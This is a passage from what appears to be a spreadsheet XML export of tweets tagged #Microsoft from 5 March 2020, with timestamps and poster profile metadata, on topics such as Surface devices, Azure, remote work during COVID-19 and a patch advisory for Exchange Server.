    <t>#Microsoft #Excel Intermediate 1 #course offered by Vanier College Continuing Education. Course starts on March 24th, 2020 &amp;amp; is offered during the evenings from 18:30 p.m. to 21:30 p.m. Sounds exciting? Then register now: https://t.co/ERgcYCdWLt #Montreal https://t.co/s6VJEF1NmY</t>
  </si>
  <si>
    <t>{'id': 19935162, 'id_str': '19935162', 'name': 'Vanier College', 'screen_name': 'vaniercollege', 'location': 'Montreal, QC', 'description': 'Vanier College is an english language CEGEP offering Career, Pre-U, Attestation, and Cont Ed programs', 'url': 'http://t.co/TD5KmQ9yZC', 'entities': {'url': {'urls': [{'url': 'http://t.co/TD5KmQ9yZC', 'expanded_url': 'http://www.vaniercollege.qc.ca', 'display_url': 'vaniercollege.qc.ca', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2851, 'friends_count': 133, 'listed_count': 117, 'created_at': 'Mon Feb 02 21:43:20 +0000 2009', 'favourites_count': 46, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3532, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'FFFFFF', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme7/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme7/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/74863036/vanier-twitter_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/74863036/vanier-twitter_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/19935162/1401381890', 'profile_link_color': 'CC0000', 'profile_sidebar_border_color': 'CCCCCC', 'profile_sidebar_fill_color': 'FFFFFF', 'profile_text_color': '000000', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Mar 05 15:33:24 +0000 2020</t>
  </si>
  <si>
    <t>If #Microsoft releases a #Surface tablet w/ an #AMD processor - #Intel is as dead as #Iphone. #Android 
It's good to have competitors because it makes sales better for us - consumer. Intel &amp;amp; #Apple aren't kings but spoiled prince's, they jack the prices up - ripping us off.</t>
  </si>
  <si>
    <t>{'id': 2959184917, 'id_str': '2959184917', 'name': 'Kal Alden ðŸ’šðŸ¼ðŸ§¢', 'screen_name': 'SwirlyKalen', 'location': 'New Mexico', 'description': 'https://t.co/yPSoR6OEiJ\nhttps://t.co/58drmX8v9A\nðŸ¼ spreading ðŸ’š.\nDisabled\n18+\nGaming | Music | Tech\n#RapSlob #KalAlden #yanggang', 'url': 'https://t.co/MT6ZC1Ont7', 'entities': {'url': {'urls': [{'url': 'https://t.co/MT6ZC1Ont7', 'expanded_url': 'http://YouTube.com/SwirlyKalen', 'display_url': 'YouTube.com/SwirlyKalen', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/yPSoR6OEiJ', 'expanded_url': 'http://paypal.me/SwirlyKalen', 'display_url': 'paypal.me/SwirlyKalen', 'indices': [0, 23]}, {'url': 'https://t.co/58drmX8v9A', 'expanded_url': 'https://www.patreon.com/SwirlyKalen', 'display_url': 'patreon.com/SwirlyKalen', 'indices': [24, 47]}]}}, 'protected': False, 'followers_count': 1111, 'friends_count': 139, 'listed_count': 0, 'created_at': 'Mon Jan 05 04:44:53 +0000 2015', 'favourites_count': 3046, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 8454,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'http://pbs.twimg.com/profile_images/720476111046643719/fU3r5w6I_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/720476111046643719/fU3r5w6I_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2959184917/1460852666',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</si>
  <si>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15:31:50 +0000 2020</t>
  </si>
  <si>
    <t>A vulnerability has been discovered in Microsoft Exchange Server and puts anyone who hasnt yet patched their server vulnerable to attack. #Microsoft states that exploitation is likely. Users should make the necessary security updates provided ASAP. https://t.co/4y2TNw06pk https://t.co/7wNwaizS23</t>
  </si>
  <si>
    <t>{'id': 1204417718016974849, 'id_str': '1204417718016974849', 'name': 'Secrutiny', 'screen_name': 'SecrutinyLtd', 'location': 'London', 'description': "We're incident response specialists who spend 95% of our time making sure our clients don't need to respond to incidents #CyberRiskManagement #SOCaaS", 'url': 'https://t.co/rb6JJYX8qx', 'entities': {'url': {'urls': [{'url': 'https://t.co/rb6JJYX8qx', 'expanded_url': 'http://www.secrutiny.com', 'display_url': 'secrutiny.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 11, 'friends_count': 28, 'listed_count': 0, 'created_at': 'Tue Dec 10 15:09:11 +0000 2019', 'favourites_count': 1,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'http://pbs.twimg.com/profile_images/1204423122566426635/kZKi1-sv_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1204423122566426635/kZKi1-sv_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1204417718016974849/1575991353',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</si>
  <si>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15:30:44 +0000 2020</t>
  </si>
  <si>
    <t>Don't be fooled. #Cloud and on-premise ERP solutions might look identical, yet there are often costs below the surface. This free TCO Iceberg Infographic explains:    #Microsoft #Technology #BusinessAutomation #accounting #MSDyn365 https://t.co/fsMlMIlwXD</t>
  </si>
  <si>
    <t>{'id': 748591446521974785, 'id_str': '748591446521974785', 'name': 'Inner Join Tech', 'screen_name': 'innerjointech', 'location': 'Covington, KY', 'description': "We are dedicated to the life cycle of your company's #data. We can help you collect, process, and #analyze data efficiently. Data &amp; #CRM Experts.", 'url': 'https://t.co/r2cUMJGdKa', 'entities': {'url': {'urls': [{'url': 'https://t.co/r2cUMJGdKa', 'expanded_url': 'https://www.innerjointech.com', 'display_url': 'innerjointech.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 90, 'friends_count': 149, 'listed_count': 21, 'created_at': 'Thu Jun 30 18:58:03 +0000 2016', 'favourites_count': 59, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 515,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'http://pbs.twimg.com/profile_images/753690117643071488/EraJEEN6_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/753690117643071488/EraJEEN6_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/748591446521974785/1468528718',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</si>
  <si>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15:30:24 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft is slowly pulling the curtain back on its dual-screen Surface Duo and #Surface Neo. @TechCrunch #cdwsocial https://t.co/d6zMJvhPGk</t>
  </si>
  <si>
    <t>{'id': 618727443, 'id_str': '618727443', 'name': 'Phillip McClure', 'screen_name': 'P_McClure', 'location': 'Southern New England', 'description': 'Principal Solution Architect - CDW -The opinions that I share are my own', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 13, 'friends_count': 29, 'listed_count': 0, 'created_at': 'Tue Jun 26 02:27:08 +0000 2012', 'favourites_count': 2, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1000,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'http://abs.twimg.com/sticky/default_profile_images/default_profile_normal.png', 'profile_image_url_https': 'https://abs.twimg.com/sticky/default_profile_images/default_profile_normal.png', 'profile_link_color': '981CEB', 'profile_sidebar_border_color': '000000', 'profile_sidebar_fill_color': '000000', 'profile_text_color': '000000', 'profile_use_background_image': False, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': True, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Mar 05 15:30:00 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft asks employees in US to work from home until March 25 amid coronavirus threat... #UnitedStates #Coronavirus #Microsoft #Seattle #California #SanFrancisco #CoronavirusOutbreak #COVID19 #COVID19 #COVID19US https://t.co/OrSB52hSFh</t>
  </si>
  <si>
    <t>Thu Mar 05 15:28:24 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft, EY, AMD: Big Names Join #DeFi Leaders on New #Ethereum Tool for Enterprises
https://t.co/PJ4Nr8AwkB https://t.co/TOFIcJkSE8</t>
  </si>
  <si>
    <t>{'id': 1185519987236188161, 'id_str': '1185519987236188161', 'name': 'CN ðŸš€ðŸ“«ðŸ’¡', 'screen_name': '_cryptoNole', 'location': 'Stoke-on-Trent, England', 'description': 'Crypto investor, miner, HODLer.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 4218, 'friends_count': 4430, 'listed_count': 4, 'created_at': 'Sat Oct 19 11:36:14 +0000 2019', 'favourites_count': 1492, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 9333, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1195827523042590720/PKHTfkkb_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1195827523042590720/PKHTfkkb_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1185519987236188161/1573942476',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</si>
  <si>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15:28:11 +0000 2020</t>
  </si>
  <si>
    <t>"This might take a while." Loosely translates: This will take bloody ages. 
#microsoft #Windows10
@Microsoft @Windows @MicrosoftUK 
#GetLinux #TheGreatEscape #LinuxMint #LinuxZorin #Linux @SGgrc  https://t.co/At8JN86BOS</t>
  </si>
  <si>
    <t>{'id': 872809506329309184, 'id_str': '872809506329309184', 'name': 'Paul Truswell', 'screen_name': 'paul_truswell', 'location': 'England', 'description': 'Life is a journey - preferably on foot ðŸ˜Ž Follow me on my next long walk @trek4jdi and https://t.co/K0xlNTr4zj supporting @JDIMacc', 'url': None, 'entities': {'description': {'urls': [{'url': 'https://t.co/K0xlNTr4zj', 'expanded_url': 'http://trek.truswell.org', 'display_url': 'trek.truswell.org', 'indices': [86, 109]}]}}, 'protected': False, 'followers_count': 221, 'friends_count': 203, 'listed_count': 1, 'created_at': 'Thu Jun 08 13:36:17 +0000 2017', 'favourites_count': 3290, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 4734, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1133326816008187905/5XvMDJ1__normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1133326816008187905/5XvMDJ1__normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/872809506329309184/1565972856',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</si>
  <si>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15:27:21 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft, #Google Offer Free Remote Work Tools Due to #Coronavirus https://t.co/CLEcbPidnR</t>
  </si>
  <si>
    <t>{'id': 38424017, 'id_str': '38424017', 'name': 'raymondkhachatourian', 'screen_name': 'raymondkh', 'location': 'Iran', 'description': 'Freelance sales and marketing consultant/ Back Office Manager at Parsonline', 'url': 'https://t.co/1nEetkXRRk', 'entities': {'url': {'urls': [{'url': 'https://t.co/1nEetkXRRk', 'expanded_url': 'http://www.mrinternet.ir', 'display_url': 'mrinternet.ir', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 261, 'friends_count': 191, 'listed_count': 45, 'created_at': 'Thu May 07 12:52:02 +0000 2009', 'favourites_count': 1391, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1900,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'http://pbs.twimg.com/profile_images/977936167575412736/C6HRRLIa_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/977936167575412736/C6HRRLIa_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/38424017/1430326920',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</si>
  <si>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15:27:04 +0000 2020</t>
  </si>
  <si>
    <t>Empowering digital transformation with .NET, ML and Azure https://t.co/5kDoY6px7w #Microsoft #Azure</t>
  </si>
  <si>
    <t>Thu Mar 05 15:25:31 +0000 2020</t>
  </si>
  <si>
    <t>Data Theft From Within  How To Protect Yourself: https://t.co/DiQkSnhImL
#AccessManagement #Microsoft #ActiveDirectory
#IdentityAccessManagement #tenfold #ITsecurity #Datasecurity https://t.co/dTClf6vO5g</t>
  </si>
  <si>
    <t>{'id': 3384372777, 'id_str': '3384372777', 'name': 'tenfold-security', 'screen_name': 'tenfoldsecurity', 'location': 'Wien, Ã–sterreich', 'description': '', 'url': 'http://t.co/1DcVEWbXID', 'entities': {'url': {'urls': [{'url': 'http://t.co/1DcVEWbXID', 'expanded_url': 'http://www.tenfold-security.com', 'display_url': 'tenfold-security.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 28, 'friends_count': 26, 'listed_count': 0, 'created_at': 'Mon Jul 20 11:47:09 +0000 2015', 'favourites_count': 13, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 159,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'http://pbs.twimg.com/profile_images/838809112993488898/MDqG1owU_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/838809112993488898/MDqG1owU_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3384372777/1438963471',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</si>
  <si>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15:25:03 +0000 2020</t>
  </si>
  <si>
    <t>@AberlourPS we have been celebrating #WorldBookDay. We were designing our own book covers using Paint, #Microsoft PowerPoint or creating an animated cover in #Scratch. #digilearnscot #CASScotland #CompatSch https://t.co/kimajGXhLn</t>
  </si>
  <si>
    <t>{'id': 269953629, 'id_str': '269953629', 'name': 'Claire Griffiths', 'screen_name': 'sassageek', 'location': 'Morayshire', 'description': 'MBCS, Primary &amp; Secondary Computing Science/ICT Teacher, Organiser of Code Club/ Coderdojo Moray, CAS UK Working group/CAS Scotland Board. All views are my own', 'url': 'https://t.co/ml58Ds2dQl', 'entities': {'url': {'urls': [{'url': 'https://t.co/ml58Ds2dQl', 'expanded_url': 'https://uk.linkedin.com/in/claire-griffiths-2a27763b', 'display_url': 'uk.linkedin.com/in/claire-grifâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 34, 'friends_count': 23, 'listed_count': 0, 'created_at': 'Mon Mar 21 19:11:32 +0000 2011', 'favourites_count': 9, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 115,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'http://pbs.twimg.com/profile_images/1008270426160713728/jD2rrA91_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1008270426160713728/jD2rrA91_normal.jpg',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</si>
  <si>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15:21:00 +0000 2020</t>
  </si>
  <si>
    <t>8 reasons to integrate your accounting into Microsoft Dynamics 365 CE  https://t.co/AgHepBIaWh
#ERPNews #Tech #Innovation #Microsoft #CRM #PowerBI #RealTimeInsights #Purchasing #Automation #MsDynCRM #OnlineBiz #Distributor #Controllers #CFOs #QuickBooks #ProAdvisors #JustSayGo https://t.co/EJghQsgmRt</t>
  </si>
  <si>
    <t>Thu Mar 05 15:20:59 +0000 2020</t>
  </si>
  <si>
    <t>Just received our #Microsoft #HoloLens2!  Love the improvements from the first #HoloLens and it really is 3 times more comfortable.  So excited to get started developing!  #GoodbyeSleep this weekend.
#MixedReality #HandTracking #EyeTracking https://t.co/TADtE7L0jS</t>
  </si>
  <si>
    <t>{'id': 1124043690127831042, 'id_str': '1124043690127831042', 'name': 'TheEverydayDev', 'screen_name': 'TheEverydayDev', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 0, 'friends_count': 41, 'listed_count': 0, 'created_at': 'Thu May 02 20:11:14 +0000 2019', 'favourites_count': 2,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'http://pbs.twimg.com/profile_images/1124560362978676736/ySE0eCVL_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1124560362978676736/ySE0eCVL_normal.jpg',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</si>
  <si>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15:20:02 +0000 2020</t>
  </si>
  <si>
    <t>In order to maximize the value received from your #Microsoft investment, @Bearson_ue  identifies common key areas of underutilization in your #Microsoft portfolio &amp;amp; how organizations can appropriately address them https://t.co/ISB0bbMcJD</t>
  </si>
  <si>
    <t>{'id': 115456568, 'id_str': '115456568', 'name': 'UpperEdge', 'screen_name': 'UpperEdge', 'location': 'Boston, MA', 'description': 'Empowering enterprises with fact-based sourcing, negotiation &amp; program execution strategies for #SAP #Salesforce #Oracle #Microsoft #Workday #ServiceNow #AWS', 'url': 'https://t.co/yxfKydrqzG', 'entities': {'url': {'urls': [{'url': 'https://t.co/yxfKydrqzG', 'expanded_url': 'http://upperedge.com/knowledge-center/blog/', 'display_url': 'upperedge.com/knowledge-centâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 832, 'friends_count': 972, 'listed_count': 43, 'created_at': 'Thu Feb 18 18:24:51 +0000 2010', 'favourites_count': 433, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2177,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'http://pbs.twimg.com/profile_images/872115445104508928/Y7HZfOeG_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/872115445104508928/Y7HZfOeG_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/115456568/1496763669', 'profile_link_color': 'C42513',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</si>
  <si>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Mar 05 15:17:55 +0000 2020</t>
  </si>
  <si>
    <t>#TBT The Homebrew Computer Club Holds First Meeting The invitation to the first meeting of the Homebrew Computer Club. Courtesy Wikimedia Commons
March 5, 1975
https://t.co/NmxnUqgOIo #ThrowbackThursday #Throwback #Microsoft #Apple https://t.co/9gPAZAGuL3</t>
  </si>
  <si>
    <t>{'id': 35203319, 'id_str': '35203319', 'name': 'Evan Kirstel', 'screen_name': 'evankirstel', 'location': 'Boston, MA', 'description': '#B2B #Analyst #Influencer helping #Enterprise #Tech clients w/ #SocialMedia #Marketing. See you at #EC20 #HIMSS20 #SXSW  #HPEdiscover! #Cloud #IoT #5G', 'url': 'https://t.co/qEToVUzSTc', 'entities': {'url': {'urls': [{'url': 'https://t.co/qEToVUzSTc', 'expanded_url': 'http://linkedin.com/in/evankirstel', 'display_url': 'linkedin.com/in/evankirstel', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 281346, 'friends_count': 265510, 'listed_count': 13810, 'created_at': 'Sat Apr 25 12:45:16 +0000 2009', 'favourites_count': 564635, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 901557,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'http://pbs.twimg.com/profile_images/1230662097534627840/dSu01e7x_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1230662097534627840/dSu01e7x_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/35203319/1583164034',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</si>
  <si>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15:16:43 +0000 2020</t>
  </si>
  <si>
    <t>German history and the responsibility for #microsoft.   #privacy #compliance #securitycompliance #publicsector https://t.co/xOlVVI92To</t>
  </si>
  <si>
    <t>{'id': 1952279486, 'id_str': '1952279486', 'name': 'Rolf Guenther@Microsoft', 'screen_name': 'RolfGuenther1', 'location': 'EMEA HQ in Dublin', 'description': 'Account Executive  for Public Healthcare in Germany at Microsoft', 'url': 'https://t.co/3k5UKxMZgy', 'entities': {'url': {'urls': [{'url': 'https://t.co/3k5UKxMZgy', 'expanded_url': 'https://enterprise.microsoft.com/de-de/industries/health/', 'display_url': 'enterprise.microsoft.com/de-de/industriâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 52, 'friends_count': 97, 'listed_count': 4, 'created_at': 'Thu Oct 10 17:51:51 +0000 2013', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 652,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'http://pbs.twimg.com/profile_images/956887787730604033/UHRsSyMq_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/956887787730604033/UHRsSyMq_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1952279486/1516974776',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</si>
  <si>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15:15:04 +0000 2020</t>
  </si>
  <si>
    <t>The push to invest in transforming business practices and modern ERP landscapes will only continue to grow in the coming years, making it critical that business leaders prepare for this change. #PowerOf3 #SAP #Microsoft #Azure https://t.co/b877PZIfZe</t>
  </si>
  <si>
    <t>{'id': 509845206, 'id_str': '509845206', 'name': 'Accenture SA', 'screen_name': 'AccentureSA', 'location': 'South Africa', 'description': 'The business landscape is changing, as are your customers and employees. Follow us for the latest on innovation and opportunity across Africa.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 5108, 'friends_count': 906, 'listed_count': 117, 'created_at': 'Thu Mar 01 07:16:38 +0000 2012', 'favourites_count': 3267, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 6836,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'http://pbs.twimg.com/profile_images/1148243810310348800/tK6lc057_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1148243810310348800/tK6lc057_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/509845206/1580729443',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</si>
  <si>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15:15:01 +0000 2020</t>
  </si>
  <si>
    <t>If you're looking to boost productivity and streamline processes within your business, then Microsoft Office 365 may be the answer. We can help you make the most of this great platform! Find out more over on our blog: https://t.co/83K4FyPhwV #Office365 #Microsoft #Manchester</t>
  </si>
  <si>
    <t>{'id': 249803981, 'id_str': '249803981', 'name': 'Aspect IT Limited', 'screen_name': 'AspectIT', 'location': 'Oldham, England', 'description': 'Providing quality IT Support, Software Development and #Website Design services across Greater #Manchester since 2003', 'url': 'https://t.co/k1m8evSVpA', 'entities': {'url': {'urls': [{'url': 'https://t.co/k1m8evSVpA', 'expanded_url': 'http://www.aspectit.co.uk', 'display_url': 'aspectit.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1543, 'friends_count': 1632, 'listed_count': 39, 'created_at': 'Wed Feb 09 20:29:16 +0000 2011', 'favourites_count': 11477, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 10064, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '9E0000', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme17/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme17/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/610458218020622336/9NThGtmR_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/610458218020622336/9NThGtmR_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/249803981/1570804992', 'profile_link_color': '800000', 'profile_sidebar_border_color': 'DBE9ED', 'profile_sidebar_fill_color': 'E6F6F9', 'profile_text_color': '333333', 'profile_use_background_image': False, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Mar 05 15:14:03 +0000 2020</t>
  </si>
  <si>
    <t>Why "Microsoft Loves Linux"? #Linux #Microsoft #OpenSource #Business https://t.co/4ltCky5jNi #3D</t>
  </si>
  <si>
    <t>Thu Mar 05 15:13:19 +0000 2020</t>
  </si>
  <si>
    <t>One More way to get confused with your voice assistant !!!
#spotify #applemusic #AmazonMusic #jiosaavn #heyspotify #heysiri #okgoogle #alexa #google #alphabet #ceo #sundarpichai #apple #timcook #microsoft #samsung #oneplus #huawei #xiaomi #android 
 https://t.co/arIooZf3vi</t>
  </si>
  <si>
    <t>{'id': 717236861593370624, 'id_str': '717236861593370624', 'name': 'TechGlass', 'screen_name': 'TechGlass1', 'location': 'Toronto, Ontario', 'description': 'An attempt to create awareness for all technology related news !! Mumbai-Toronto DM for free promotions!!', 'url': 'https://t.co/xjjPJH2GW5', 'entities': {'url': {'urls': [{'url': 'https://t.co/xjjPJH2GW5', 'expanded_url': 'https://thetechglass.wixsite.com/techglass', 'display_url': 'thetechglass.wixsite.com/techglass', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 152, 'friends_count': 611, 'listed_count': 2, 'created_at': 'Tue Apr 05 06:26:08 +0000 2016', 'favourites_count': 261, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 329, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/748357386591576064/s9IeFeRL_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/748357386591576064/s9IeFeRL_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/717236861593370624/1467257225',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</si>
  <si>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15:09:17 +0000 2020</t>
  </si>
  <si>
    <t>Amid the #coronavirus outbreak, #American tech firms like #Apple, #Google and #Microsoft have looked to move #hardware production out of #China to countries like #Vietnam and #Thailand. 
https://t.co/WzXWxPO7s0</t>
  </si>
  <si>
    <t>{'id': 371229186, 'id_str': '371229186', 'name': 'Jeremy Song', 'screen_name': 'tezuma75', 'location': 'San Francisco, singapore ', 'description': 'Je vous souhaite bonne chance. ðŸ€\n\n               tomorrow will be better.ðŸŒ´', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 1151, 'friends_count': 3007, 'listed_count': 9, 'created_at': 'Sat Sep 10 12:59:32 +0000 2011', 'favourites_count': 40686, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 23121,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'http://pbs.twimg.com/profile_images/1191059825154654208/WyZ0dEuG_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1191059825154654208/WyZ0dEuG_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/371229186/1486058091',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</si>
  <si>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15:09:08 +0000 2020</t>
  </si>
  <si>
    <t>#Achmea Increases availability for #SAP #HANA, using @SUSE Linux Enterprise Server for SAP Apps on #Microsoft #Azure, from the standard 99.99% to 99.9999% availability https://t.co/wcaNNJ0vgj</t>
  </si>
  <si>
    <t>{'id': 43308861, 'id_str': '43308861', 'name': 'Andrew', 'screen_name': 'AndrewSteggles', 'location': 'South of England', 'description': 'Marketer for leading companies in the IT/Telecoms industry. Big fan of open source. All opinions expressed here are my own.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 202, 'friends_count': 227, 'listed_count': 17, 'created_at': 'Fri May 29 10:41:39 +0000 2009', 'favourites_count': 264, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 9378,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'http://pbs.twimg.com/profile_images/471613811053445120/7o1mYoAD_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/471613811053445120/7o1mYoAD_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/43308861/1506436650', 'profile_link_color': 'B35F00',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</si>
  <si>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15:08:55 +0000 2020</t>
  </si>
  <si>
    <t>My Morning! 
#xbox #xboxone #masterchief #halo5 #microsoft #guns #2ndamendment #america #pyrography #woodburning #pyrographyart #games #gamerguy #gamer #gamer4life #destinythegame #samsung #videogames... https://t.co/NXAJjNeyAY</t>
  </si>
  <si>
    <t>Thu Mar 05 15:08:07 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft + AT&amp;amp;T Partnership delivers 5G Network Edge Compute Technology
 #ATT #iot #Microsoft #Azure
https://t.co/E9XbXrYlen</t>
  </si>
  <si>
    <t>Thu Mar 05 15:07:30 +0000 2020</t>
  </si>
  <si>
    <t>SMBs are hungry for #tech that brings customer data together and helps drive #DigitalTransformation. More, via @smbgroup    #Microsoft #Technology #BusinessAutomation #accounting #MSDyn365 https://t.co/bUBg66Q2ls</t>
  </si>
  <si>
    <t>{'id': 23060659, 'id_str': '23060659', 'name': 'Mark Evans', 'screen_name': 'marktevans', 'location': 'Washington DC', 'description': 'Selling the Cloud', 'url': 'http://t.co/VFM1sAHJDe', 'entities': {'url': {'urls': [{'url': 'http://t.co/VFM1sAHJDe', 'expanded_url': 'http://www.sharetechsolutions.com', 'display_url': 'sharetechsolutions.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 121, 'friends_count': 510, 'listed_count': 6, 'created_at': 'Fri Mar 06 13:07:18 +0000 2009', 'favourites_count': 58, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2201,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'http://pbs.twimg.com/profile_images/1184280751593938944/7YIVl59k_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1184280751593938944/7YIVl59k_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/23060659/1527883321',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</si>
  <si>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15:07:01 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft is bringing free tier for Cosmos DB. 
A great offering for many budding ideas to get started and one that would go in sync with a free tier web app.
 #microsoft #azure #cosmosdb #freetier https://t.co/OWt4Z303wU</t>
  </si>
  <si>
